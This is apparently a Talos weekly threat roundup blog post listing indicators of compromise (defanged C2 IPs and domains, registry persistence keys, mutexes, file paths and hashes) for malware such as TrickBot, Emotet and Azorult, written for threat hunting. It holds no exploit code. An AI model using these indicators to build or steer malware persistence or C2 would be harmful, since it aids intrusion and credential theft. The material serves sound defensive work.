Threat Roundup for January 17 to January 24

January 24, 2020, 12:58 pm

≫ Next: Threat Source newsletter (Jan. 30, 2020)

≪ Previous: Threat Source newsletter (Jan. 23, 2020)

$

0

0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 17 and Jan. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat Name	Type	Description
Win.Packed.TrickBot-7541396-1	Packed	Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.Qakbot-7541405-1	Dropper	Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
Win.Packed.Nymaim-7542552-1	Packed	Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Malware.Azorult-7541464-1	Malware	Azorult is a banking trojan that attempts to steal credit card data and other sensitive information to facilitate cybercrime.
Doc.Malware.Emotet-7544675-1	Malware	Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Worm.Vobfus-7541859-0	Worm	Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
Win.Trojan.XpertRAT-7550253-1	Trojan	XpertRAT is a remote access trojan that provides an attacker with the ability to access an infected machine remotely and has the ability to steal sensitive information like usernames and passwords. XpertRAT has been around since 2011 and consists of a core component and multiple modules, all written in Delphi.
Win.Trojan.Upatre-7549404-0	Trojan	Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
Win.Packed.Passwordstealera-7544289-0	Packed	This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed.

---

Threat Breakdown

Win.Packed.TrickBot-7541396-1

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Value Name: Blob	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PROFILELIST\S-1-5-21-2580483871-590521980-3826313501-500 Value Name: RefCount	2
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE Value Name: Blob	1

Mutexes	Occurrences
Global\316D1C7871E10	40

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
95[.]181[.]198[.]151	24
79[.]174[.]12[.]245	22
195[.]123[.]240[.]81	16
185[.]62[.]188[.]83	12
181[.]140[.]173[.]186	10
5[.]182[.]210[.]109	10
185[.]99[.]2[.]149	10
85[.]143[.]219[.]230	10
23[.]95[.]231[.]187	10
176[.]119[.]159[.]204	9
198[.]23[.]209[.]201	8
5[.]2[.]76[.]122	8
146[.]185[.]219[.]31	8
198[.]8[.]91[.]10	6
92[.]63[.]105[.]138	6
5[.]182[.]211[.]44	6
164[.]68[.]120[.]60	5
181[.]129[.]104[.]139	4
51[.]89[.]73[.]159	4
216[.]239[.]38[.]21	3
181[.]113[.]28[.]146	3
176[.]58[.]123[.]25	2
116[.]203[.]16[.]95	2
52[.]44[.]169[.]135	2
52[.]55[.]255[.]113	2

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
teene[.]site	6
checkip[.]amazonaws[.]com	4
api[.]ipify[.]org	3
ipinfo[.]io	3
ident[.]me	2
ip[.]anysrc[.]net	2
api[.]ip[.]sb	2
ipecho[.]net	2
2cdajlnnwxfylth4[.]onion	2
www[.]myexternalip[.]com	1
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org	1
myexternalip[.]com	1
icanhazip[.]com	1
wtfismyip[.]com	1

Files and or directories created	Occurrences
%System32%\Tasks\Task Gpu health	40
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt	40
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp	40
None	39
%APPDATA%\DirectTools\data	25
%APPDATA%\DirectTools\settings.ini	25
%APPDATA%\gpuhealth	15
%APPDATA%\gpuhealth\data	15
%APPDATA%\gpuhealth\settings.ini	15
%APPDATA%\DirectTools\Data\pwgrab64	2
%APPDATA%\DirectTools\data\pwgrab64_configs\dpost	2
%APPDATA%\DirectTools\data\pwgrab64_configs	1

File Hashes

0143ebd2f87acf44bf4b8dc9f03ba00e7eff4d2a723e93bfb7c628a83b993f9a 06951826498d418e5f0ca33112d2cb607d738e9ccb08feaa1ce3427bffa22600 06fce1e6e9c3187d9cf087c6fe4034785f1ffaccbe9b500e424dcc03946a83da 0a1a547185e396fa877b82e7cbc716fe682a95588914944246f0b18c8828bf8f 0addc7b9d5e37d663277cdc9c15fa001ed5db6fa59263a5869b5aed99180ef02 0e4b9cea532791a825d4774d95580827667bff1e75f83b936d0e5cc3ab7236e6 16a0f1a7a0fe7277e4ef69b214b48a0c7f6a96fee6c78bf979b92fb97aed3c83 1f42082ee2954a70c60d15886366307ccacbb8080f03daa536e3fae361a46f4d 20ec1ae9bf3e33e2321f10cb230cc543792b94ecfaf358847b6b85e6d03af17f 297e4bd8eb28b69336a5d05abefd50985f7f5161c1bb08dd54a287a85123f856 2a1494652183e00b35e5566123fa3a2b3d73f9ac8a686258b4905a47a5354488 30b023cc4b072dfdef48929f92bbf283d112a92d03698b58b4c4fea402912c82 31ef497ec1ba5f2a858c92732416cff7bc1a1cdfaddef2ec539b09bbf9e83369 34610185ae8d7ccb60c2c536a2a1ed17be1b4741d2f88206f874276309b439ac 364252d2f0111a2d1bb24aaae430f57ae07c6209682b3567d5c99bbc73a2ce26 3826b709fd3add9b91d37828209ca8b8c05aa60ca2c34d82be1f4260b8188f83 38b5cf64a8cb8099d5c24d82ddd981f00941126c53b999906ddab7b4eff05b11 3c4bf379d34de653845d1efc59eb441388e99aa7e72137b5964d74467d58013f 3e206f84c4467a51a246ada113646b8dd79aebec8b2ecbd515434335db48f6f0 4172720904201256e209df95026384a4a46c1cd5f7910aa7d309633b747e37da 45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3 47e90d2bd50809df1e9b1b8bc97883dbfa277a760914179cc8f8e54b58290852 4d13f83b56a619c0c34d5fa2fd1c3376ed3c3b837d626599983be29a0e31cc00 4d3eb4806824008f979eae543f41cc90e1e7dd47d95b70bb98984454974d0865 52e86752e9af7aec9c31ea3f3bb224ad02966c11bf7ef73e0eeaf4c247fd2a51

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA

Screenshots of Detection

ThreatGrid

---

Win.Dropper.Qakbot-7541405-1

Indicators of Compromise

Mutexes	Occurrences
ocmwn	22

Files and or directories created	Occurrences
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt	22
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp	22
\TEMP\437d5b4d9e4c5d8ab4615871f9e7830c.exe	1
\TEMP\385ece7d547122fba5d712c7495a6721.exe	1
\TEMP\c09a343a545e0f9e36444a847e3ad5ac.exe	1
\TEMP\c78811efdd2612e5ca25249df2cf7600.exe	1

File Hashes

0aea1de8b679fe547239de586664d4693f8cc6cef89340b3fb161c09630f6b14 1118a488e6f39981fb9b24b1bbf3dcd9c0bde2ca79353ad231427a96e951340e 15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4 1e24651cd82da5234ef6dc48f67ea123889fab0dcfe9d41c9d9e4aaba7016786 1ea2902b3b1245d195b86c48a72ea70591877f99beeb622c20bb8ec672ce2daf 298c9f7d8fb46cbf8d3d59a9b145ebbc1c27cb507e4290cd37f02e6754225ddf 2a389b7f20979df29d32ecbcfb0c290891aea90d483f29f95617c2b06dc72670 3617f78b320d1e2efa260579b7d7df9beb37fc47c4bb7d5f320d7675f18894ed 3754ca2f4e3057827092577b1385fde7f07a53f12c6ddc3d6fd5f0f9d6a1239c 457b9bd110b9ada83477e9e1b578663cc3fa5e9d8d0eea8eb41bca51ed11fe09 4c1c055f423adc3d2eed4a54602bf607ccf2562f498aca8b1f1e7e23e1054373 6e2382936ba75dc342bec4ddee3bfc1f3a608f9dfaf3146c9a23d6e3551d6e3f 8e01ab60655a87bdc2a3b56bdc84a50e1c4079555218f28ff6fdc6e1ac109e92 a73e870268c6baa9b6c1f646b7b56d96655b0e2af784be9b5de3dd618c0e8fde bec8eb12798277e788ee835a6da3873fac69a68fb9796d2f248b9b3162285869 c0a8971ffec59c7987826d4ba03fbe539263b92f90718dbdabf6cc382531e417 c78e50570a2d04460be294f5bf5626d03b21c177aa0271e0597baea65caaa2b2 ca0e1deff6b8bcdb9bd5a170529339c6582e78deaa5153db86098fe65664f7e2 cd64755ab2a51aeeefe9afb202ddc84b7f04570271f27630eaf8ea76811937a0 d119ff32920eb407b85a23c825b67454444c0b5097deae743ab8f774f5416d28 d1c307f7b14523f3fa68fbbe0c41b39c40c3a8a27db996d4b952cb7fc183a42b dd722366c1a992ad2e014c2eacb856e76f7677acee045ed552ae3b2ee05e2e99

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

ThreatGrid

---

Win.Packed.Nymaim-7542552-1

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK	15
<HKCU>\SOFTWARE\MICROSOFT\GOCFK Value Name: mbijg	15

Mutexes	Occurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}	15
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}	15
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}	15
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}	15
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}	15
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}	15
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}	15
Local\{888E04DB-EDDB-D2EC-5F32-1719D74FA2E0}	15
Local\{D876A547-0EDD-4A55-0873-9F0D6D3719FB}	15

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
fzncuowwstw[.]pw	15
wawrgrtjcdr[.]com	15
ochirxt[.]net	15
klcbberl[.]com	15
fxcskhwr[.]in	15
vpbcco[.]net	15
mrbhs[.]pw	15
wiztdyzp[.]com	15
eqbrnmigl[.]in	15
csuaibcneix[.]net	15
lnulxvsvvl[.]pw	15
szthbpsn[.]pw	15
nokuznpxbypo[.]com	15
tthzpuipne[.]pw	15
juxrdizkivk[.]net	15
hcjihn[.]in	1
omcbnlos[.]net	1
voxrdn[.]net	1
zbztpauc[.]pw	1
caojbfvum[.]net	1
dkzexx[.]net	1
npdcqoxaepfz[.]net	1
ljhafrwlf[.]in	1
vauordi[.]com	1
bfeqxicrqaxp[.]pw	1

*See JSON for more IOCs

Files and or directories created	Occurrences
%ProgramData%\ph	15
%ProgramData%\ph\fktiipx.ftf	15
%TEMP%\gocf.ksv	15
%ProgramData%\<random, matching '[a-z0-9]{3,7}'>	15
%APPDATA%\<random, matching '[a-z0-9]{3,7}'>	15
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>	15
%TEMP%\fro.dfx	12
\Documents and Settings\All Users\pxs\pil.ohu	12
%TEMP%\bpnb.skg	1
%TEMP%\haqhxh.vsz	1
\Documents and Settings\All Users\po\vikog.axh	1

File Hashes

13faed74357cf5f5a66983ce864e49d8ab3d16dc0c4c04a95888fe6ff2580b5c 1e22dbdfbcafcef6e91099b7c345a52a4f59a92fe1f8d30e333bce0d92b7c850 2c22e368525024b26e7c7d1058260093a2f380373010e6e387bea75e325c613c 36799b98d45008973435f10c8e1ba40288b92d6199e4ecec16e40e918e44d58d 3f9a8d0d084d4640a73140faf01df696531c0a6d762309655c503718b412a081 4a70f8df27631b3f76c1a6d520aa53983484e442dd79155d20101fae271e98c5 63fe06736f3fe6ef3ae4c58c89cebc9f055872cab247a707490e3c4b41ca8ff7 9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4 a315a6e21350c5a9811f5006b78ffc5906e5f0c2fc1ed31af8bfc7e056f12797 a66e66ef119cb1451ba006a49417432bc8700f096adff827d4ae7bf0dae07a67 acebcce1368e7a969746cae53715768a37620dc2cfd278f4cff2b891c0d9af6c c43573752804b8f215c95dcb4ab87985cfc87010bfe459e9ab836c8dacb86f5c ccd4a7ded8fa23a750dc9437399cdc6f84964fc0fe4106b2df67ad558014b9e9 e0e5fb674a45c8d4515294b2b591860679993da4a2c48f656f206fa874a5cb98 fd65221380cfca194a1dbd9351357ee2fd0c132784385ed1ff3141c5b19a6805

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

ThreatGrid

---

Win.Malware.Azorult-7541464-1

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\PICTURE	20
<HKCU>\SOFTWARE\PICTURE\PICTUREPROCESSINGTOOLSV1.0	20
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER Value Name: GlobalAssocChangedCounter	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: DisplayName	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: DisplayVersion	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: VersionMajor	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: VersionMinor	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: Publisher	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: DisplayIcon	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: UninstallString	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: URLInfoAbout	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: HelpLink	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: InstallLocation	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: InstallSource	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: Language	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: NoModify	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: NoRepair	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: InstallDate	10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 Value Name: EstimatedSize	10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE	9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE Value Name: Type	9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE Value Name: Start	9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE Value Name: ErrorControl	9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE Value Name: DisplayName	9

Mutexes	Occurrences
d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963}	10
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A	10
Global\<random guid>	10
01B1CA98-EE2E-41B3-8A2F-F319643109E5	2
None	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
216[.]83[.]52[.]40	20
103[.]91[.]210[.]187	11
45[.]139[.]236[.]14	10
23[.]106[.]124[.]148	10
45[.]76[.]18[.]39	9
37[.]140[.]192[.]153	9
104[.]27[.]185[.]71	7
185[.]99[.]133[.]121	6
37[.]140[.]192[.]166	6
88[.]99[.]66[.]31	5
13[.]107[.]21[.]200	4
93[.]190[.]142[.]79	3
208[.]95[.]112[.]1	3
209[.]141[.]34[.]150	3
216[.]83[.]52[.]19	3
104[.]27[.]184[.]71	3
183[.]131[.]207[.]66	2
216[.]83[.]52[.]20	2
204[.]79[.]197[.]200	1
220[.]243[.]236[.]20	1
220[.]242[.]158[.]12	1
104[.]28[.]10[.]3	1
204[.]188[.]226[.]98	1
104[.]27[.]171[.]106	1
194[.]36[.]188[.]13	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
iplogger[.]org	10
silvergeoa[.]com	10
area[.]cyp360[.]com	10
installsilver[.]com	9
confirmssystems[.]com	9
passwordkernel[.]online	9
123321123[.]fun	6
scp46[.]hosting[.]reg[.]ru	4
ip-api[.]com	3
myprintscreen[.]com	3
fbinstall[.]cyp360[.]com	3
ok	2
js[.]users[.]51[.]la	2
ia[.]51[.]la	2
budison-oklarly[.]com	2
ac[.]681776[.]com	2
yip[.]su	1
megagemes[.]info	1
termscenter[.]com	1
cleand8yv0m6g[.]top	1
newbook-t[.]info	1

Files and or directories created	Occurrences
\TEMP\d	20
\TEMP\d-shm	20
\TEMP\d-wal	20
%TEMP%\~atmp	11
%ProgramData%	10
%TEMP%\$inst	10
%TEMP%\$inst\2.tmp	10
%TEMP%\$inst\temp_0.tmp	10
\TEMP\config.ini	10
%ProgramFiles(x86)%\wotsuper	10
%ProgramFiles(x86)%\wotsuper\wotsuper	10
%ProgramFiles(x86)%\wotsuper\wotsuper\Uninstall.exe	10
%ProgramFiles(x86)%\wotsuper\wotsuper\Uninstall.ini	10
%ProgramFiles(x86)%\wotsuper\wotsuper\wotsuper.exe	10
%ProgramFiles(x86)%\wotsuper\wotsuper\wotsuper1.exe	10
%SystemRoot%\wotsuper.reg	10
%ProgramData%\freebl3.dll	9
%ProgramData%\mozglue.dll	9
%SystemRoot%\SysWOW64\config.ini	9
%APPDATA%\Mozilla\Firefox\Profiles\1LCUQ8~1.DEF\cookies.sqlite-shm	9
%APPDATA%\Mozilla\Firefox\Profiles\1LCUQ8~1.DEF\cookies.sqlite-wal	9
%ProgramData%\msvcp140.dll	8
%ProgramData%\nss3.dll	6
%HOMEPATH%\pwordkrn.exe	6
%ProgramData%\softokn3.dll	5

*See JSON for more IOCs

File Hashes

0034790f990238fe8e57d28800a8498bce5bdf3604cc56fc670ac5d65c6e5e08 249de6212474007cb9cf42a68939fae2f769f2097a57afa664a4780b2641228e 275eb1700ac5dbe3b62ce16a06409c4866728f72ee9e5c10f43beba094038475 48ab169b253421d2ece727161c6ff26c47836d5905fa685812010c6de4b75b27 681297a82e85822a1cb5a58296a515151f417bb8aafe5d4505d2219b4fe61438 70576eb8cd35093b1ef56da7fb39bf88f32c57f410484d613b5028cecbb1b0df 743238d01b2f968044ee2b175c61574aca518874c67201146f19df5a53c3b0d2 7e71eda28ecca392d6e86a9004c3bd38c7cbdf79399e90742feac5fa066aba66 a6abe3b046e8bdcfb33fa9776195fbb89a3e4218f6bb281aedd15f28fe1f4818 bad303ab4b68379128469e3be92d5bf3b23ec7bb285a260b1fadeead3fe43bbf bc55f494359805cc4d89f6812c3a1a14d593d9ead82267dcae7029dcbddebcab be2201940b246ae89cae4f6d0a691a1092289868230f1da85f9142d180709744 c66fe1a34cbe3a966ecbd1beb87b425e004a4a21f38bd483c2c10ef7c77e5e0b c8a3cb15adb8639ceaa0092b3a7f69f362cb48bcd96ffd18d362a38a1fbfff41 d39e3e47d12347b27f81a75751145bf6915b6a12caffa2dc4b0981666339c3bb e0b5780569ee0983401f373b03909ba27babc52c258eb150939e0b9d337de594 eaa8bbd1fee19574eeed935d8756223876c64d3ca49b372c04b98b6912108586 f34e64f4e7be7e6b2c665700ec513b4783e570a4de2087ac9511f152d812b2f5 f4b4158338fe30016fb7034b70bc3babcee3be21ea5c214451d83e3cb31233d8 fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

ThreatGrid

---

Doc.Malware.Emotet-7544675-1

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: Type	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: Start	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: ErrorControl	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: ImagePath	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: DisplayName	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: WOW64	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA Value Name: ObjectName	7

Mutexes	Occurrences
Global\I98B68E3C	7
Global\M98B68E3C	7
Global\Nx534F51BC	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
190[.]17[.]44[.]48	7
70[.]123[.]95[.]180	7
74[.]220[.]194[.]30	7
59[.]120[.]5[.]154	3
100[.]66[.]142[.]61	3
100[.]108[.]145[.]200	3
100[.]87[.]27[.]180	3
100[.]83[.]251[.]131	3
100[.]90[.]84[.]106	3
17[.]36[.]205[.]74	2
74[.]202[.]142[.]71	2
24[.]232[.]0[.]227	2
200[.]45[.]191[.]16	2
74[.]202[.]142[.]98/31	2
51[.]77[.]113[.]100	2
98[.]103[.]188[.]70	1
200[.]107[.]202[.]33	1
67[.]212[.]168[.]237	1
85[.]115[.]130[.]101	1
206[.]126[.]59[.]246	1
162[.]211[.]85[.]171	1
80[.]93[.]143[.]50	1
203[.]130[.]9[.]8	1
192[.]185[.]21[.]150	1
192[.]185[.]2[.]205	1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
jayracing[.]com	10
rcmgdev44[.]xyz	3
demu[.]hu	3
itconsortium[.]net	3
josemoo[.]com	3
smtp[.]prodigy[.]net[.]mx	2
smtp[.]fibertel[.]com[.]ar	2
smtp[.]infinitummail[.]com	2
smtp[.]arnet[.]com[.]ar	2
smtp[.]dsl[.]telkomsa[.]net	2
mail[.]1and1[.]com	1
smtp[.]tcc-la[.]com	1
smtp[.]indisa[.]cl	1
mail[.]cemcol[.]hn	1
mail[.]cobico[.]co	1
cowealth[.]com[.]tw	1
mail[.]an-car[.]it	1
mail[.]argo[.]ge	1
smtp[.]1und[.]de	1
mail[.]fracma[.]co	1
mail[.]castel[.]ge	1
smtpvip[.]reis[.]mx	1
mail[.]stscambodia[.]com	1
smtp[.]netvoice[.]com[.]ph	1
mail[.]mygrande[.]net	1

*See JSON for more IOCs

Files and or directories created	Occurrences
%HOMEPATH%\229.exe	10

File Hashes

0c9ef55223b45ef57ef38a98bbb1675f4bb284af6a56f9157e4c86b864360719 412e213dd241031a172b48a422bbcf8e3e0b45e89a984fc45028fa96299f459a 42e61e25f4b3d2b57fa973344417602c6e43537eeef6f7fdf32f9d34bf8f3604 6c4c28356c53832f5ab0a5acc2a14f4f907188655dd315bf1e18581c4c48337e 70dc1946d77ef19522ccc9d18629e8777283a715d3fa055ff7f0559331db3e26 81c603712c753de8200c0cb6dd28d6b37ac2873b968bdf8929ca129d35195d4a ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2 ca1e6ff31df37242aa2e09a4cb29b7546dd408c0b0de26dd2a946183eea64b95 d676ecd3750ce75f42ed0c6958863e01ffbf92b5169c1899513b0affc952b9de dfe5f28fde5c483ba38aff7def0df3938ae4837acb81cba696f57159fa6fa0b6

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Worm.Vobfus-7541859-0

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: WindowsDefender	7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: WindowsDefender	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: WindowsDefender	7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: WindowsDefender	7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: update	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: update	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: update	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: update	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: BWOJ39VGEPRBJ	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: BWOJ39VGEPRBJ	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: BWOJ39VGEPRBJ	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: BWOJ39VGEPRBJ	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IOAUWN4A3W4AA	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IOAUWN4A3W4AA	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: IOAUWN4A3W4AA	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: IOAUWN4A3W4AA	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 8L9ROXIFMECH6	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 8L9ROXIFMECH6	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: 8L9ROXIFMECH6	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: 8L9ROXIFMECH6	1
